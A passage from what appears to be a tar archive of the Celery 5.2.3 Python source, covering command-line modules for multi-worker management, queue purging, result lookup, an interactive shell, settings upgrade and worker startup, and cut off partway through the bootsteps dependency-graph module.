-c 3 """ import os import signal import sys from functools import wraps import click from kombu.utils.objects import cached_property from celery import VERSION_BANNER from celery.apps.multi import Cluster, MultiParser, NamespacedOptionParser from celery.bin.base import CeleryCommand, handle_preload_options from celery.platforms import EX_FAILURE, EX_OK, signals from celery.utils import term from celery.utils.text import pluralize __all__ = ('MultiTool',) USAGE = """\ usage: {prog_name} start [worker options] {prog_name} stop [-SIG (default: -TERM)] {prog_name} restart [-SIG] [worker options] {prog_name} kill {prog_name} show [worker options] {prog_name} get hostname [-qv] [worker options] {prog_name} names {prog_name} expand template {prog_name} help additional options (must appear after command name): * --nosplash: Don't display program info. * --quiet: Don't show as much output. * --verbose: Show more output. * --no-color: Don't display colors. """ def main(): sys.exit(MultiTool().execute_from_commandline(sys.argv)) def splash(fun): @wraps(fun) def _inner(self, *args, **kwargs): self.splash() return fun(self, *args, **kwargs) return _inner def using_cluster(fun): @wraps(fun) def _inner(self, *argv, **kwargs): return fun(self, self.cluster_from_argv(argv), **kwargs) return _inner def using_cluster_and_sig(fun): @wraps(fun) def _inner(self, *argv, **kwargs): p, cluster = self._cluster_from_argv(argv) sig = self._find_sig_argument(p) return fun(self, cluster, sig, **kwargs) return _inner class TermLogger: splash_text = 'celery multi v{version}' splash_context = {'version': VERSION_BANNER} #: Final exit code. retcode = 0 def setup_terminal(self, stdout, stderr, nosplash=False, quiet=False, verbose=False, no_color=False, **kwargs): self.stdout = stdout or sys.stdout self.stderr = stderr or sys.stderr self.nosplash = nosplash self.quiet = quiet self.verbose = verbose self.no_color = no_color def ok(self, m, newline=True, file=None): self.say(m, newline=newline, file=file) return EX_OK def say(self, m, newline=True, file=None): print(m, file=file or self.stdout, end='\n' if newline else '') def carp(self, m, newline=True, file=None): return self.say(m, newline, file or self.stderr) def error(self, msg=None): if msg: self.carp(msg) self.usage() return EX_FAILURE def info(self, msg, newline=True): if self.verbose: self.note(msg, newline=newline) def note(self, msg, newline=True): if not self.quiet: self.say(str(msg), newline=newline) @splash def usage(self): self.say(USAGE.format(prog_name=self.prog_name)) def splash(self): if not self.nosplash: self.note(self.colored.cyan( self.splash_text.format(**self.splash_context))) @cached_property def colored(self): return term.colored(enabled=not self.no_color) class MultiTool(TermLogger): """The ``celery multi`` program.""" MultiParser = MultiParser OptionParser = NamespacedOptionParser reserved_options = [ ('--nosplash', 'nosplash'), ('--quiet', 'quiet'), ('-q', 'quiet'), ('--verbose', 'verbose'), ('--no-color', 'no_color'), ] def __init__(self, env=None, cmd=None, fh=None, stdout=None, stderr=None, **kwargs): # fh is an old alias to stdout. self.env = env self.cmd = cmd self.setup_terminal(stdout or fh, stderr, **kwargs) self.fh = self.stdout self.prog_name = 'celery multi' self.commands = { 'start': self.start, 'show': self.show, 'stop': self.stop, 'stopwait': self.stopwait, 'stop_verify': self.stopwait, # compat alias 'restart': self.restart, 'kill': self.kill, 'names': self.names, 'expand': self.expand, 'get': self.get, 'help': self.help, } def execute_from_commandline(self, argv, cmd=None): # Reserve the --nosplash|--quiet|-q/--verbose options. argv = self._handle_reserved_options(argv) self.cmd = cmd if cmd is not None else self.cmd self.prog_name = os.path.basename(argv.pop(0)) if not self.validate_arguments(argv): return self.error() return self.call_command(argv[0], argv[1:]) def validate_arguments(self, argv): return argv and argv[0][0] != '-' def call_command(self, command, argv): try: return self.commands[command](*argv) or EX_OK except KeyError: return self.error(f'Invalid command: {command}') def _handle_reserved_options(self, argv): argv = list(argv) # don't modify callers argv. for arg, attr in self.reserved_options: if arg in argv: setattr(self, attr, bool(argv.pop(argv.index(arg)))) return argv @splash @using_cluster def start(self, cluster): self.note('> Starting nodes...') return int(any(cluster.start())) @splash @using_cluster_and_sig def stop(self, cluster, sig, **kwargs): return cluster.stop(sig=sig, **kwargs) @splash @using_cluster_and_sig def stopwait(self, cluster, sig, **kwargs): return cluster.stopwait(sig=sig, **kwargs) stop_verify = stopwait # compat @splash @using_cluster_and_sig def restart(self, cluster, sig, **kwargs): return int(any(cluster.restart(sig=sig, **kwargs))) @using_cluster def names(self, cluster): self.say('\n'.join(n.name for n in cluster)) def get(self, wanted, *argv): try: node = self.cluster_from_argv(argv).find(wanted) except KeyError: return EX_FAILURE else: return self.ok(' '.join(node.argv)) @using_cluster def show(self, cluster): return self.ok('\n'.join( ' '.join(node.argv_with_executable) for node in cluster )) @splash @using_cluster def kill(self, cluster): return cluster.kill() def expand(self, template, *argv): return self.ok('\n'.join( node.expander(template) for node in self.cluster_from_argv(argv) )) def help(self, *argv): self.say(__doc__) def _find_sig_argument(self, p, default=signal.SIGTERM): args = p.args[len(p.values):] for arg in reversed(args): if len(arg) == 2 and arg[0] == '-': try: return int(arg[1]) except ValueError: pass if arg[0] == '-': try: return signals.signum(arg[1:]) except (AttributeError, TypeError): pass return default def _nodes_from_argv(self, argv, cmd=None): cmd = cmd if cmd is not None else self.cmd p = self.OptionParser(argv) p.parse() return p, self.MultiParser(cmd=cmd).parse(p) def cluster_from_argv(self, argv, cmd=None): _, cluster = self._cluster_from_argv(argv, cmd=cmd) return cluster def _cluster_from_argv(self, argv, cmd=None): p, nodes = self._nodes_from_argv(argv, cmd=cmd) return p, self.Cluster(list(nodes), cmd=cmd) def Cluster(self, nodes, cmd=None): return Cluster( nodes, cmd=cmd, env=self.env, on_stopping_preamble=self.on_stopping_preamble, on_send_signal=self.on_send_signal, on_still_waiting_for=self.on_still_waiting_for, on_still_waiting_progress=self.on_still_waiting_progress, on_still_waiting_end=self.on_still_waiting_end, on_node_start=self.on_node_start, on_node_restart=self.on_node_restart, on_node_shutdown_ok=self.on_node_shutdown_ok, on_node_status=self.on_node_status, on_node_signal_dead=self.on_node_signal_dead, on_node_signal=self.on_node_signal, on_node_down=self.on_node_down, on_child_spawn=self.on_child_spawn, on_child_signalled=self.on_child_signalled, on_child_failure=self.on_child_failure, ) def on_stopping_preamble(self, nodes): self.note(self.colored.blue('> Stopping nodes...')) def on_send_signal(self, node, sig): self.note('\t> {0.name}: {1} -> {0.pid}'.format(node, sig)) def on_still_waiting_for(self, nodes): num_left = len(nodes) if num_left: self.note(self.colored.blue( '> Waiting for {} {} -> {}...'.format( num_left, pluralize(num_left, 'node'), ', '.join(str(node.pid) for node in nodes)), ), newline=False) def on_still_waiting_progress(self, nodes): self.note('.', newline=False) def on_still_waiting_end(self): self.note('') def on_node_signal_dead(self, node): self.note( 'Could not signal {0.name} ({0.pid}): No such process'.format( node)) def on_node_start(self, node): self.note(f'\t> {node.name}: ', newline=False) def on_node_restart(self, node): self.note(self.colored.blue( f'> Restarting node {node.name}: '), newline=False) def on_node_down(self, node): self.note(f'> {node.name}: {self.DOWN}') def on_node_shutdown_ok(self, node): self.note(f'\n\t> {node.name}: {self.OK}') def on_node_status(self, node, retval): self.note(retval and self.FAILED or self.OK) def on_node_signal(self, node, sig): self.note('Sending {sig} to node {0.name} ({0.pid})'.format( node, sig=sig)) def on_child_spawn(self, node, argstr, env): self.info(f' {argstr}') def on_child_signalled(self, node, signum): self.note(f'* Child was terminated by signal {signum}') def on_child_failure(self, node, retcode): self.note(f'* Child terminated with exit code {retcode}') @cached_property def OK(self): return str(self.colored.green('OK')) @cached_property def FAILED(self): return str(self.colored.red('FAILED')) @cached_property def DOWN(self): return str(self.colored.magenta('DOWN')) @click.command( cls=CeleryCommand, context_settings={ 'allow_extra_args': True, 'ignore_unknown_options': True } ) @click.pass_context @handle_preload_options def multi(ctx): """Start multiple worker instances.""" cmd = MultiTool(quiet=ctx.obj.quiet, no_color=ctx.obj.no_color) # In 4.x, celery multi ignores the global --app option. # Since in 5.0 the --app option is global only we # rearrange the arguments so that the MultiTool will parse them correctly. args = sys.argv[1:] args = args[args.index('multi'):] + args[:args.index('multi')] return cmd.execute_from_commandline(args) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/purge.py0000664000175000017500000000502200000000000016423 0ustar00asifasif00000000000000"""The ``celery purge`` program, used to delete messages from queues.""" import click from celery.bin.base import (COMMA_SEPARATED_LIST, CeleryCommand, CeleryOption, handle_preload_options) from celery.utils import text @click.command(cls=CeleryCommand) @click.option('-f', '--force', cls=CeleryOption, is_flag=True, help_group='Purging Options', help="Don't prompt for verification.") @click.option('-Q', '--queues', cls=CeleryOption, type=COMMA_SEPARATED_LIST, help_group='Purging Options', help="Comma separated list of queue names to purge.") @click.option('-X', '--exclude-queues', cls=CeleryOption, type=COMMA_SEPARATED_LIST, help_group='Purging Options', help="Comma separated list of queues names not to purge.") @click.pass_context @handle_preload_options def purge(ctx, force, queues, exclude_queues): """Erase all messages from all known task queues. Warning: There's no undo operation for this command. """ app = ctx.obj.app queues = set(queues or app.amqp.queues.keys()) exclude_queues = set(exclude_queues or []) names = queues - exclude_queues qnum = len(names) if names: queues_headline = text.pluralize(qnum, 'queue') if not force: queue_names = ', '.join(sorted(names)) click.confirm(f"{ctx.obj.style('WARNING', fg='red')}:" "This will remove all tasks from " f"{queues_headline}: {queue_names}.\n" " There is no undo for this operation!\n\n" "(to skip this prompt use the -f option)\n" "Are you sure you want to delete all tasks?", abort=True) def _purge(conn, queue): try: return conn.default_channel.queue_purge(queue) or 0 except conn.channel_errors: return 0 with app.connection_for_write() as conn: messages = sum(_purge(conn, queue) for queue in names) if messages: messages_headline = text.pluralize(messages, 'message') ctx.obj.echo(f"Purged {messages} {messages_headline} from " f"{qnum} known task {queues_headline}.") else: ctx.obj.echo(f"No messages purged from {qnum} {queues_headline}.") ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/result.py0000664000175000017500000000175700000000000016632 0ustar00asifasif00000000000000"""The ``celery result`` program, used to inspect task results.""" import click from celery.bin.base import (CeleryCommand, CeleryOption, handle_preload_options) @click.command(cls=CeleryCommand) @click.argument('task_id') @click.option('-t', '--task', cls=CeleryOption, help_group='Result Options', help="Name of task (if custom backend).") @click.option('--traceback', cls=CeleryOption, is_flag=True, help_group='Result Options', help="Show traceback instead.") @click.pass_context @handle_preload_options def result(ctx, task_id, task, traceback): """Print the return value for a given task id.""" app = ctx.obj.app result_cls = app.tasks[task].AsyncResult if task else app.AsyncResult task_result = result_cls(task_id) value = task_result.traceback if traceback else task_result.get() # TODO: Prettify result ctx.obj.echo(value) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/shell.py0000664000175000017500000001131100000000000016406 0ustar00asifasif00000000000000"""The ``celery shell`` program, used to start a REPL.""" import os import sys from importlib import import_module import click from celery.bin.base import (CeleryCommand, CeleryOption, handle_preload_options) def _invoke_fallback_shell(locals): import code try: import readline except ImportError: pass else: import rlcompleter readline.set_completer( rlcompleter.Completer(locals).complete) readline.parse_and_bind('tab:complete') code.interact(local=locals) def _invoke_bpython_shell(locals): import bpython bpython.embed(locals) def _invoke_ipython_shell(locals): for ip in (_ipython, _ipython_pre_10, _ipython_terminal, _ipython_010, _no_ipython): try: return ip(locals) except ImportError: pass def _ipython(locals): from IPython import start_ipython start_ipython(argv=[], user_ns=locals) def _ipython_pre_10(locals): # pragma: no cover from IPython.frontend.terminal.ipapp import TerminalIPythonApp app = TerminalIPythonApp.instance() app.initialize(argv=[]) app.shell.user_ns.update(locals) app.start() def _ipython_terminal(locals): # pragma: no cover from IPython.terminal import embed embed.TerminalInteractiveShell(user_ns=locals).mainloop() def _ipython_010(locals): # pragma: no cover from IPython.Shell import IPShell IPShell(argv=[], user_ns=locals).mainloop() def _no_ipython(self): # pragma: no cover raise ImportError('no suitable ipython found') def _invoke_default_shell(locals): try: import IPython # noqa except ImportError: try: import bpython # noqa except ImportError: _invoke_fallback_shell(locals) else: _invoke_bpython_shell(locals) else: _invoke_ipython_shell(locals) @click.command(cls=CeleryCommand) @click.option('-I', '--ipython', is_flag=True, cls=CeleryOption, help_group="Shell Options", help="Force IPython.") @click.option('-B', '--bpython', is_flag=True, cls=CeleryOption, help_group="Shell Options", help="Force bpython.") @click.option('--python', is_flag=True, cls=CeleryOption, help_group="Shell Options", help="Force default Python shell.") @click.option('-T', '--without-tasks', is_flag=True, cls=CeleryOption, help_group="Shell Options", help="Don't add tasks to locals.") @click.option('--eventlet', is_flag=True, cls=CeleryOption, help_group="Shell Options", help="Use eventlet.") @click.option('--gevent', is_flag=True, cls=CeleryOption, help_group="Shell Options", help="Use gevent.") @click.pass_context @handle_preload_options def shell(ctx, ipython=False, bpython=False, python=False, without_tasks=False, eventlet=False, gevent=False): """Start shell session with convenient access to celery symbols. The following symbols will be added to the main globals: - ``celery``: the current application. - ``chord``, ``group``, ``chain``, ``chunks``, ``xmap``, ``xstarmap`` ``subtask``, ``Task`` - all registered tasks. """ sys.path.insert(0, os.getcwd()) if eventlet: import_module('celery.concurrency.eventlet') if gevent: import_module('celery.concurrency.gevent') import celery app = ctx.obj.app app.loader.import_default_modules() # pylint: disable=attribute-defined-outside-init locals = { 'app': app, 'celery': app, 'Task': celery.Task, 'chord': celery.chord, 'group': celery.group, 'chain': celery.chain, 'chunks': celery.chunks, 'xmap': celery.xmap, 'xstarmap': celery.xstarmap, 'subtask': celery.subtask, 'signature': celery.signature, } if not without_tasks: locals.update({ task.__name__: task for task in app.tasks.values() if not task.name.startswith('celery.') }) if python: _invoke_fallback_shell(locals) elif bpython: try: _invoke_bpython_shell(locals) except ImportError: ctx.obj.echo(f'{ctx.obj.ERROR}: bpython is not installed') elif ipython: try: _invoke_ipython_shell(locals) except ImportError as e: ctx.obj.echo(f'{ctx.obj.ERROR}: {e}') _invoke_default_shell(locals) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/upgrade.py0000664000175000017500000000602700000000000016736 0ustar00asifasif00000000000000"""The ``celery upgrade`` command, used to upgrade from previous versions.""" import codecs import sys import click from celery.app import defaults from celery.bin.base import (CeleryCommand, CeleryOption, handle_preload_options) from celery.utils.functional import pass1 @click.group() @click.pass_context @handle_preload_options def upgrade(ctx): """Perform upgrade between versions.""" def _slurp(filename): # TODO: Handle case when file does not exist with codecs.open(filename, 'r', 'utf-8') as read_fh: return [line for line in read_fh] def _compat_key(key, namespace='CELERY'): key = key.upper() if not key.startswith(namespace): key = '_'.join([namespace, key]) return key def _backup(filename, suffix='.orig'): lines = [] backup_filename = ''.join([filename, suffix]) print(f'writing backup to {backup_filename}...', file=sys.stderr) with codecs.open(filename, 'r', 'utf-8') as read_fh: with codecs.open(backup_filename, 'w', 'utf-8') as backup_fh: for line in read_fh: backup_fh.write(line) lines.append(line) return lines def _to_new_key(line, keyfilter=pass1, source=defaults._TO_NEW_KEY): # sort by length to avoid, for example, broker_transport overriding # broker_transport_options. for old_key in reversed(sorted(source, key=lambda x: len(x))): new_line = line.replace(old_key, keyfilter(source[old_key])) if line != new_line and 'CELERY_CELERY' not in new_line: return 1, new_line # only one match per line. return 0, line @upgrade.command(cls=CeleryCommand) @click.argument('filename') @click.option('--django', cls=CeleryOption, is_flag=True, help_group='Upgrading Options', help='Upgrade Django project.') @click.option('--compat', cls=CeleryOption, is_flag=True, help_group='Upgrading Options', help='Maintain backwards compatibility.') @click.option('--no-backup', cls=CeleryOption, is_flag=True, help_group='Upgrading Options', help="Don't backup original files.") def settings(filename, django, compat, no_backup): """Migrate settings from Celery 3.x to Celery 4.x.""" lines = _slurp(filename) keyfilter = _compat_key if django or compat else pass1 print(f'processing {filename}...', file=sys.stderr) # gives list of tuples: ``(did_change, line_contents)`` new_lines = [ _to_new_key(line, keyfilter) for line in lines ] if any(n[0] for n in new_lines): # did have changes if not no_backup: _backup(filename) with codecs.open(filename, 'w', 'utf-8') as write_fh: for _, line in new_lines: write_fh.write(line) print('Changes to your setting have been made!', file=sys.stdout) else: print('Does not seem to require any changes :-)', file=sys.stdout) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/celery/bin/worker.py0000664000175000017500000003076500000000000016626 0ustar00asifasif00000000000000"""Program used to start a Celery worker instance.""" import os import sys import click from click import ParamType from click.types import StringParamType from celery import concurrency from celery.bin.base import (COMMA_SEPARATED_LIST, LOG_LEVEL, CeleryDaemonCommand, CeleryOption, handle_preload_options) from celery.concurrency.base import BasePool from celery.exceptions import SecurityError from celery.platforms import (EX_FAILURE, EX_OK, detached, maybe_drop_privileges) from celery.utils.log import get_logger from celery.utils.nodenames import default_nodename, host_format, node_format logger = get_logger(__name__) class CeleryBeat(ParamType): """Celery Beat flag.""" name = "beat" def convert(self, value, param, ctx): if ctx.obj.app.IS_WINDOWS and value: self.fail('-B option does not work on Windows. ' 'Please run celery beat as a separate service.') return value class WorkersPool(click.Choice): """Workers pool option.""" name = "pool" def __init__(self): """Initialize the workers pool option with the relevant choices.""" super().__init__(concurrency.get_available_pool_names()) def convert(self, value, param, ctx): # Pools like eventlet/gevent needs to patch libs as early # as possible. if isinstance(value, type) and issubclass(value, BasePool): return value value = super().convert(value, param, ctx) worker_pool = ctx.obj.app.conf.worker_pool if value == 'prefork' and worker_pool: # If we got the default pool through the CLI # we need to check if the worker pool was configured. # If the worker pool was configured, we shouldn't use the default. value = concurrency.get_implementation(worker_pool) else: value = concurrency.get_implementation(value) if not value: value = concurrency.get_implementation(worker_pool) return value class Hostname(StringParamType): """Hostname option.""" name = "hostname" def convert(self, value, param, ctx): return host_format(default_nodename(value)) class Autoscale(ParamType): """Autoscaling parameter.""" name = ", " def convert(self, value, param, ctx): value = value.split(',') if len(value) > 2: self.fail("Expected two comma separated integers or one integer." f"Got {len(value)} instead.") if len(value) == 1: try: value = (int(value[0]), 0) except ValueError: self.fail(f"Expected an integer. Got {value} instead.") try: return tuple(reversed(sorted(map(int, value)))) except ValueError: self.fail("Expected two comma separated integers." f"Got {value.join(',')} instead.") CELERY_BEAT = CeleryBeat() WORKERS_POOL = WorkersPool() HOSTNAME = Hostname() AUTOSCALE = Autoscale() C_FAKEFORK = os.environ.get('C_FAKEFORK') def detach(path, argv, logfile=None, pidfile=None, uid=None, gid=None, umask=None, workdir=None, fake=False, app=None, executable=None, hostname=None): """Detach program by argv.""" fake = 1 if C_FAKEFORK else fake # `detached()` will attempt to touch the logfile to confirm that error # messages won't be lost after detaching stdout/err, but this means we need # to pre-format it rather than relying on `setup_logging_subsystem()` like # we can elsewhere. logfile = node_format(logfile, hostname) with detached(logfile, pidfile, uid, gid, umask, workdir, fake, after_forkers=False): try: if executable is not None: path = executable os.execv(path, [path] + argv) return EX_OK except Exception: # pylint: disable=broad-except if app is None: from celery import current_app app = current_app app.log.setup_logging_subsystem( 'ERROR', logfile, hostname=hostname) logger.critical("Can't exec %r", ' '.join([path] + argv), exc_info=True) return EX_FAILURE @click.command(cls=CeleryDaemonCommand, context_settings={'allow_extra_args': True}) @click.option('-n', '--hostname', default=host_format(default_nodename(None)), cls=CeleryOption, type=HOSTNAME, help_group="Worker Options", help="Set custom hostname (e.g., 'w1@%%h'). " "Expands: %%h (hostname), %%n (name) and %%d, (domain).") @click.option('-D', '--detach', cls=CeleryOption, is_flag=True, default=False, help_group="Worker Options", help="Start worker as a background process.") @click.option('-S', '--statedb', cls=CeleryOption, type=click.Path(), callback=lambda ctx, _, value: value or ctx.obj.app.conf.worker_state_db, help_group="Worker Options", help="Path to the state database. The extension '.db' may be " "appended to the filename.") @click.option('-l', '--loglevel', default='WARNING', cls=CeleryOption, type=LOG_LEVEL, help_group="Worker Options", help="Logging level.") @click.option('optimization', '-O', default='default', cls=CeleryOption, type=click.Choice(('default', 'fair')), help_group="Worker Options", help="Apply optimization profile.") @click.option('--prefetch-multiplier', type=int, metavar="", callback=lambda ctx, _, value: value or ctx.obj.app.conf.worker_prefetch_multiplier, cls=CeleryOption, help_group="Worker Options", help="Set custom prefetch multiplier value " "for this worker instance.") @click.option('-c', '--concurrency', type=int, metavar="", callback=lambda ctx, _, value: value or ctx.obj.app.conf.worker_concurrency, cls=CeleryOption, help_group="Pool Options", help="Number of child processes processing the queue. " "The default is the number of CPUs available" " on your system.") @click.option('-P', '--pool', default='prefork', type=WORKERS_POOL, cls=CeleryOption, help_group="Pool Options", help="Pool implementation.") @click.option('-E', '--task-events', '--events', is_flag=True, default=None, cls=CeleryOption, help_group="Pool Options", help="Send task-related events that can be captured by monitors" " like celery events, celerymon, and others.") @click.option('--time-limit', type=float, cls=CeleryOption, help_group="Pool Options", help="Enables a hard time limit " "(in seconds int/float) for tasks.") @click.option('--soft-time-limit', type=float, cls=CeleryOption, help_group="Pool Options", help="Enables a soft time limit " "(in seconds int/float) for tasks.") @click.option('--max-tasks-per-child', type=int, cls=CeleryOption, help_group="Pool Options", help="Maximum number of tasks a pool worker can execute before " "it's terminated and replaced by a new worker.") @click.option('--max-memory-per-child', type=int, cls=CeleryOption, help_group="Pool Options", help="Maximum amount of resident memory, in KiB, that may be " "consumed by a child process before it will be replaced " "by a new one. If a single task causes a child process " "to exceed this limit, the task will be completed and " "the child process will be replaced afterwards.\n" "Default: no limit.") @click.option('--purge', '--discard', is_flag=True, cls=CeleryOption, help_group="Queue Options") @click.option('--queues', '-Q', type=COMMA_SEPARATED_LIST, cls=CeleryOption, help_group="Queue Options") @click.option('--exclude-queues', '-X', type=COMMA_SEPARATED_LIST, cls=CeleryOption, help_group="Queue Options") @click.option('--include', '-I', type=COMMA_SEPARATED_LIST, cls=CeleryOption, help_group="Queue Options") @click.option('--without-gossip', is_flag=True, cls=CeleryOption, help_group="Features") @click.option('--without-mingle', is_flag=True, cls=CeleryOption, help_group="Features") @click.option('--without-heartbeat', is_flag=True, cls=CeleryOption, help_group="Features", ) @click.option('--heartbeat-interval', type=int, cls=CeleryOption, help_group="Features", ) @click.option('--autoscale', type=AUTOSCALE, cls=CeleryOption, help_group="Features", ) @click.option('-B', '--beat', type=CELERY_BEAT, cls=CeleryOption, is_flag=True, help_group="Embedded Beat Options") @click.option('-s', '--schedule-filename', '--schedule', callback=lambda ctx, _, value: value or ctx.obj.app.conf.beat_schedule_filename, cls=CeleryOption, help_group="Embedded Beat Options") @click.option('--scheduler', cls=CeleryOption, help_group="Embedded Beat Options") @click.pass_context @handle_preload_options def worker(ctx, hostname=None, pool_cls=None, app=None, uid=None, gid=None, loglevel=None, logfile=None, pidfile=None, statedb=None, **kwargs): """Start worker instance. Examples -------- $ celery --app=proj worker -l INFO $ celery -A proj worker -l INFO -Q hipri,lopri $ celery -A proj worker --concurrency=4 $ celery -A proj worker --concurrency=1000 -P eventlet $ celery worker --autoscale=10,0 """ try: app = ctx.obj.app if ctx.args: try: app.config_from_cmdline(ctx.args, namespace='worker') except (KeyError, ValueError) as e: # TODO: Improve the error messages raise click.UsageError( "Unable to parse extra configuration from command line.\n" f"Reason: {e}", ctx=ctx) if kwargs.get('detach', False): argv = ['-m', 'celery'] + sys.argv[1:] if '--detach' in argv: argv.remove('--detach') if '-D' in argv: argv.remove('-D') return detach(sys.executable, argv, logfile=logfile, pidfile=pidfile, uid=uid, gid=gid, umask=kwargs.get('umask', None), workdir=kwargs.get('workdir', None), app=app, executable=kwargs.get('executable', None), hostname=hostname) maybe_drop_privileges(uid=uid, gid=gid) worker = app.Worker( hostname=hostname, pool_cls=pool_cls, loglevel=loglevel, logfile=logfile, # node format handled by celery.app.log.setup pidfile=node_format(pidfile, hostname), statedb=node_format(statedb, hostname), no_color=ctx.obj.no_color, quiet=ctx.obj.quiet, **kwargs) worker.start() return worker.exitcode except SecurityError as e: ctx.obj.error(e.args[0]) ctx.exit(1) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bootsteps.py0000664000175000017500000003001100000000000016547 0ustar00asifasif00000000000000"""A directed acyclic graph of reusable components.""" from collections import deque from threading import Event from kombu.common import ignore_errors from kombu.utils.encoding import bytes_to_str from kombu.utils.imports import symbol_by_name from .utils.graph import DependencyGraph, GraphFormatter from .utils.imports import instantiate, qualname from .utils.log import get_logger try: from greenlet import GreenletExit except ImportError: # pragma: no cover IGNORE_ERRORS = () else: IGNORE_ERRORS = (GreenletExit,) __all__ = ('Blueprint', 'Step', 'StartStopStep', 'ConsumerStep') #: States RUN = 0x1 CLOSE = 0x2 TERMINATE = 0x3 logger = get_logger(__name__) def _pre(ns, fmt): return f'| {ns.alias}: {fmt}' def _label(s): return s.name.rsplit('.', 1)[-1] class StepFormatter(GraphFormatter): """Graph formatter for :class:`Blueprint`.""" blueprint_prefix = '⧉' conditional_prefix = '∘' blueprint_scheme = { 'shape': 'parallelogram', 'color': 'slategray4', 'fillcolor': 'slategray3', } def label(self, step): return step and '{}{}'.format( self._get_prefix(step), bytes_to_str( (step.label or _label(step)).encode('utf-8', 'ignore')), ) def _get_prefix(self, step): if step.last: return self.blueprint_prefix if step.conditional: return self.conditional_prefix return '' def node(self, obj, **attrs): scheme = self.blueprint_scheme if obj.last else self.node_scheme return self.draw_node(obj, scheme, attrs) def edge(self, a, b, **attrs): if a.last: attrs.update(arrowhead='none', color='darkseagreen3') return self.draw_edge(a, b, self.edge_scheme, attrs) class Blueprint: """Blueprint containing bootsteps that can be applied to objects. Arguments: steps Sequence[Union[str, Step]]: List of steps. name (str): Set explicit name for this blueprint. on_start (Callable): Optional callback applied after blueprint start. on_close (Callable): Optional callback applied before blueprint close. on_stopped (Callable): Optional callback applied after blueprint stopped. """ GraphFormatter = StepFormatter name = None state = None started = 0 default_steps = set() state_to_name = { 0: 'initializing', RUN: 'running', CLOSE: 'closing', TERMINATE: 'terminating', } def __init__(self, steps=None, name=None, on_start=None, on_close=None, on_stopped=None): self.name = name or self.name or qualname(type(self)) self.types = set(steps or []) | set(self.default_steps) self.on_start = on_start self.on_close = on_close self.on_stopped = on_stopped self.shutdown_complete = Event() self.steps = {} def start(self, parent): self.state = RUN if self.on_start: self.on_start() for i, step in enumerate(s for s in parent.steps if s is not None): self._debug('Starting %s', step.alias) self.started = i + 1 step.start(parent) logger.debug('^-- substep ok') def human_state(self): return self.state_to_name[self.state or 0] def info(self, parent): info = {} for step in parent.steps: info.update(step.info(parent) or {}) return info def close(self, parent): if self.on_close: self.on_close() self.send_all(parent, 'close', 'closing', reverse=False) def restart(self, parent, method='stop', description='restarting', propagate=False): self.send_all(parent, method, description, propagate=propagate) def send_all(self, parent, method, description=None, reverse=True, propagate=True, args=()): description = description or method.replace('_', ' ') steps = reversed(parent.steps) if reverse else parent.steps for step in steps: if step: fun = getattr(step, method, None) if fun is not None: self._debug('%s %s...', description.capitalize(), step.alias) try: fun(parent, *args) except Exception as exc: # pylint: disable=broad-except if propagate: raise logger.exception( 'Error on %s %s: %r', description, step.alias, exc) def stop(self, parent, close=True, terminate=False): what = 'terminating' if terminate else 'stopping' if self.state in (CLOSE, TERMINATE): return if self.state != RUN or self.started != len(parent.steps): # Not fully started, can safely exit. self.state = TERMINATE self.shutdown_complete.set() return self.close(parent) self.state = CLOSE self.restart( parent, 'terminate' if terminate else 'stop', description=what, propagate=False, ) if self.on_stopped: self.on_stopped() self.state = TERMINATE self.shutdown_complete.set() def join(self, timeout=None): try: # Will only get here if running green, # makes sure all greenthreads have exited. self.shutdown_complete.wait(timeout=timeout) except IGNORE_ERRORS: pass def apply(self, parent, **kwargs): """Apply the steps in this blueprint to an object. This will apply the ``__init__`` and ``include`` methods of each step, with the object as argument:: step = Step(obj) ... step.include(obj) For :class:`StartStopStep` the services created will also be added to the objects ``steps`` attribute. """ self._debug('Preparing bootsteps.') order = self.order = [] steps = self.steps = self.claim_steps() self._debug('Building graph...') for S in self._finalize_steps(steps): step = S(parent, **kwargs) steps[step.name] = step order.append(step) self._debug('New boot order: {%s}', ', '.join(s.alias for s in self.order)) for step in order: step.include(parent) return self def connect_with(self, other): self.graph.adjacent.update(other.graph.adjacent) self.graph.add_edge(type(other.order[0]), type(self.order[-1])) def __getitem__(self, name): return self.steps[name] def _find_last(self): return next((C for C in self.steps.values() if C.last), None) def _firstpass(self, steps): for step in steps.values(): step.requires = [symbol_by_name(dep) for dep in step.requires] stream = deque(step.requires for step in steps.values()) while stream: for node in stream.popleft(): node = symbol_by_name(node) if node.name not in self.steps: steps[node.name] = node stream.append(node.requires) def _finalize_steps(self, steps): last = self._find_last() self._firstpass(steps) it = ((C, C.requires) for C in steps.values()) G = self.graph = DependencyGraph( it, formatter=self.GraphFormatter(root=last), ) if last: for obj in G: if obj != last: G.add_edge(last, obj) try: return G.topsort() except KeyError as exc: raise KeyError('unknown bootstep: %s' % exc) def claim_steps(self): return dict(self.load_step(step) for step in self.types) def load_step(self, step): step = symbol_by_name(step) return step.name, step def _debug(self, msg, *args): return logger.debug(_pre(self, msg), *args) @property def alias(self): return _label(self) class StepType(type): """Meta-class for steps.""" name = None requires = None def __new__(cls, name, bases, attrs): module = attrs.get('__module__') qname = f'{module}.{name}' if module else name attrs.update( __qualname__=qname, name=attrs.get('name') or qname, ) return super().__new__(cls, name, bases, attrs) def __str__(cls): return cls.name def __repr__(cls): return 'step:{0.name}{{{0.requires!r}}}'.format(cls) class Step(metaclass=StepType): """A Bootstep. The :meth:`__init__` method is called when the step is bound to a parent object, and can as such be used to initialize attributes in the parent object at parent instantiation-time. """ #: Optional step name, will use ``qualname`` if not specified. name = None #: Optional short name used for graph outputs and in logs. label = None #: Set this to true if the step is enabled based on some condition. conditional = False #: List of other steps that that must be started before this step. #: Note that all dependencies must be in the same blueprint. requires = () #: This flag is reserved for the workers Consumer, #: since it is required to always be started last. #: There can only be one object marked last #: in every blueprint. last = False #: This provides the default for :meth:`include_if`. enabled = True def __init__(self, parent, **kwargs): pass def include_if(self, parent): """Return true if bootstep should be included. You can define this as an optional predicate that decides whether this step should be created. """ return self.enabled def 